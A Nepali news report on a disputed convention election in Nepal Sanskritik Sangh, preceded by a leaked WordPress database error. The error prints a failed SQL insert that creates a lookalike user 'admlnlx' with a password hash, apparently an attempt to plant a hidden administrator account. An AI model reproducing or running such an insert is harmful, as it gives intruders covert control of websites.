WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAU5rEr.OKS.2P5m35hEDBaUvY6VLB/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 22:38:11', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २४-
नेपाली काँग्रेसको शुभेच्छुक संस्था नेपाल सांस्कृतिक सङ्घको दोस्रो महाधिवेशनको निर्वाचन प्रक्रिया अन्योलमा परेको छ ।
माघ २१ गते उद्घाटन भएको महाधिवेशन २२ गते बन्दसत्र र २३ गते मतदान हुनुपर्नेमा प्रतिनिधि विवाद र सहमतीय प्रणालीमा जान खोजेपछि निर्वाचन प्रक्रिया अन्योलमा परेको हो । आठ सय ६१ प्रतिनिधि रहेको सो महाधिवेशनमा निर्वाचन अन्योलमा परेका कारण आधाजसो प्रतिनिधि जिल्ला फर्केको महाधिवेशन प्रतिनिधि दुर्गा रायमाझीले राससलाई जानकारी दिनुभयो ।
सांस्कृतिक सङ्घभित्र देखिएको विवाद मिलाउन पार्टीले केन्द्रीय सदस्य एवम् पूर्वमन्त्री एनपी साउदको संयोजकत्वमा प्रदीप पौडेल र गुरुराज घिमिरे सदस्य रहने गरी तीन सदस्यीय निर्देशन समिति गठन गरेको थियो । निर्देशन समितिका सदस्य पौडेलले निर्वाचनबारे टुङ्गो लगाउन समितिको बैठक बसिरहेको जानकारी दिनुभयो ।- रासस